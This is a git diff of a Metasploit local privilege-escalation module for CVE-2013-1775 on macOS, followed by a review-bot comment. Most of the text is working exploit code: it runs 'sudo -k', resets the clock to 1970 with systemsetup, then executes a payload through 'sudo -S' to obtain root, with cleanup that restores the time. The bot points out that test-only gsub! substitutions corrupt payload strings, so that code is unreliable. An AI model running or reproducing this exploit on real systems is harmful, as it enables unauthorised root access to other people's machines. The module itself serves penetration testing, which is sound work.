Merge pull request #2 from jvazquez-r7/test_osx
merge in @jvazquez-r7's fixes for osx sudo modulebug/bundler_fix
commit
155f336b6f
|
@ -37,32 +37,41 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
ran the sudo command.
|
ran the sudo command.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' => [ 'joev <jvennix[at]rapid7.com>'],
|
'Author' =>
|
||||||
'Platform' => [ 'osx' ],
|
|
||||||
'SessionTypes' => [ 'shell', 'meterpreter'],
|
|
||||||
'References' => [['CVE', '2013-1775']],
|
|
||||||
'Platform' => 'osx',
|
|
||||||
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
|
|
||||||
'Targets' => [
|
|
||||||
[
|
[
|
||||||
'Mac OS X x86 (Native Payload)', {
|
'Todd C. Miller', # Vulnerability discovery
|
||||||
|
'joev <jvennix[at]rapid7.com>' # Metasploit module
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2013-1775'],
|
||||||
|
['OSVDB', '90677']
|
||||||
|
],
|
||||||
|
'Platform' => 'osx',
|
||||||
|
'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],
|
||||||
|
'SessionTypes' => [ 'shell', 'meterpreter'],
|
||||||
|
'Targets' => [
|
||||||
|
[ 'Mac OS X x86 (Native Payload)',
|
||||||
|
{
|
||||||
'Platform' => 'osx',
|
'Platform' => 'osx',
|
||||||
'Arch' => ARCH_X86
|
'Arch' => ARCH_X86
|
||||||
}
|
}
|
||||||
], [
|
],
|
||||||
'Mac OS X x64 (Native Payload)', {
|
[ 'Mac OS X x64 (Native Payload)',
|
||||||
|
{
|
||||||
'Platform' => 'osx',
|
'Platform' => 'osx',
|
||||||
'Arch' => ARCH_X64
|
'Arch' => ARCH_X86_64
|
||||||
}
|
}
|
||||||
], [
|
],
|
||||||
'CMD', {
|
[ 'CMD',
|
||||||
|
{
|
||||||
'Platform' => 'unix',
|
'Platform' => 'unix',
|
||||||
'Arch' => ARCH_CMD
|
'Arch' => ARCH_CMD
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
'DefaultOptions' => { "PrependFork" => true },
|
'DefaultTarget' => 0,
|
||||||
'DefaultTarget' => 0
|
'DisclosureDate' => 'Feb 28 2013'
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -73,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
sudo_vn = $1
|
sudo_vn = $1
|
||||||
sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i)
|
sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i)
|
||||||
# check vn between 1.6.0 through 1.7.10p6
|
# check vn between 1.6.0 through 1.7.10p6
|
||||||
# and 1.8.0 through 1.8.6p6
|
# and 1.8.0 through 1.8.6p6
|
||||||
if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)
|
if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)
|
||||||
print_error "sudo version #{sudo_vn} not vulnerable."
|
print_error "sudo version #{sudo_vn} not vulnerable."
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
|
@ -84,8 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
if not user_in_admin_group?
|
if not user_in_admin_group?
|
||||||
print_error "sudo version is vulnerable, but user is not in the "+
|
print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."
|
||||||
"admin group (necessary to change the date)."
|
|
||||||
Exploit::CheckCode::Safe
|
Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
# one root for you sir
|
# one root for you sir
|
||||||
|
@ -108,30 +116,48 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
print_status("Payload dropped and registered for cleanup")
|
print_status("Payload dropped and registered for cleanup")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -gettime")
|
||||||
@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
|
@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -getdate")
|
||||||
@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
|
@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -getusingnetworktime")
|
||||||
@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
|
@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -gettimezone")
|
||||||
@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
|
@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
|
||||||
@network_server = if @networked
|
@network_server = if @networked
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -getnetworktimeserver")
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
|
cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
|
||||||
end
|
end
|
||||||
|
|
||||||
|
print_warning("Cleanup to be done in case something goes really bad")
|
||||||
|
print_warning("Execute: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
|
||||||
|
print_warning("Execute: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
|
||||||
|
print_warning("Execute: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
|
||||||
|
if @networked
|
||||||
|
print_warning("Execute: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
|
||||||
|
if @network_server
|
||||||
|
print_warning("Execute: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
run_sudo_cmd
|
run_sudo_cmd
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def cleanup
|
def cleanup
|
||||||
return if @_cleaning_up
|
print_status("cleanup callback")
|
||||||
@_cleaning_up = true
|
if not @_cleaning_up
|
||||||
|
@_cleaning_up = true
|
||||||
|
do_cleanup
|
||||||
|
end
|
||||||
|
super
|
||||||
|
end
|
||||||
|
|
||||||
print_status("Resetting system clock to original values") if @time
|
def on_new_session(session)
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
|
print_status("on_new_session callback")
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
|
if not @_cleaning_up
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
|
@_cleaning_up = true
|
||||||
if @networked
|
do_cleanup
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
|
|
||||||
unless @network_server.nil?
|
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
|
@ -145,9 +171,17 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
['sudo', '-S', payload.encoded].join(' ')
|
['sudo', '-S', payload.encoded].join(' ')
|
||||||
end
|
end
|
||||||
|
|
||||||
# to prevent the password prompt from destroying session
|
# Ugly stuff just to test CMD tar isnt running because of the env variables not being preserved
|
||||||
sudo_cmd = 'echo "" | '+sudo_cmd_raw
|
sudo_cmd_raw.gsub!(/python/, "/usr/bin/python")
|
||||||
|
sudo_cmd_raw.gsub!(/ruby/, "/usr/bin/ruby")
|
||||||
|
sudo_cmd_raw.gsub!(/sh/, "/bin/sh")
|
||||||
|
|
||||||
|
## to prevent the password prompt from destroying session
|
||||||
|
sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & sleep 5'
|
||||||
|
|
||||||
|
print_status("Executing: sudo -k; \n"+
|
||||||
|
"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
|
||||||
|
" -settimezone GMT -settime 00:00")
|
||||||
cmd_exec(
|
cmd_exec(
|
||||||
"sudo -k; \n"+
|
"sudo -k; \n"+
|
||||||
"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
|
"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
|
||||||
|
@ -166,6 +200,28 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
print_good output
|
print_good output
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def do_cleanup
|
||||||
|
print_status("Resetting system clock to original values") if @time
|
||||||
|
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
|
||||||
|
cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
|
||||||
|
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
|
||||||
|
cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
|
||||||
|
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
|
||||||
|
cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
|
||||||
|
|
||||||
|
if @networked
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
|
||||||
|
cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
|
||||||
|
unless @network_server.nil?
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
|
||||||
|
cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
# helper methods for accessing datastore
|
# helper methods for accessing datastore
|
||||||
def using_native_target?; target.name =~ /native/i; end
|
def using_native_target?; target.name =~ /native/i; end
|
||||||
def using_cmd_target?; target.name =~ /cmd/i; end
|
def using_cmd_target?; target.name =~ /cmd/i; end
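Review bot: The three `gsub!` calls added in the `@ -145,9 +171,17 @@` hunk rewrite every unanchored occurrence of `python`, `ruby` and `sh` inside the payload string, so a CMD payload containing `bash`, `ssh`, `flush` or an already-absolute `/bin/sh` is corrupted (`bash` becomes `ba/bin/sh`, `/usr/bin/python` becomes `/usr/bin//usr/bin/python`) before it reaches `sudo`, and the comment above them admits they were left in from testing. If the intent is only to give `sudo` an absolute interpreter path because the environment is not preserved, anchor each substitution to a standalone word not already preceded by a path component, e.g. `sudo_cmd_raw.gsub!(%r{(?<![\w/])python\b}, '/usr/bin/python')`, `sudo_cmd_raw.gsub!(%r{(?<![\w/])ruby\b}, '/usr/bin/ruby')`, `sudo_cmd_raw.gsub!(%r{(?<![\w/])sh\b}, '/bin/sh')`, and replace the "Ugly stuff just to test" comment with one stating why the absolute paths are needed. The `& sleep 5` appended on the same hunk also backgrounds the sudo invocation, so whatever `output` the surrounding method later prints is presumably no longer the payload's output; worth a comment if that is intended. The enclosing method starts before this hunk and its `cmd_exec` call continues past it.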
|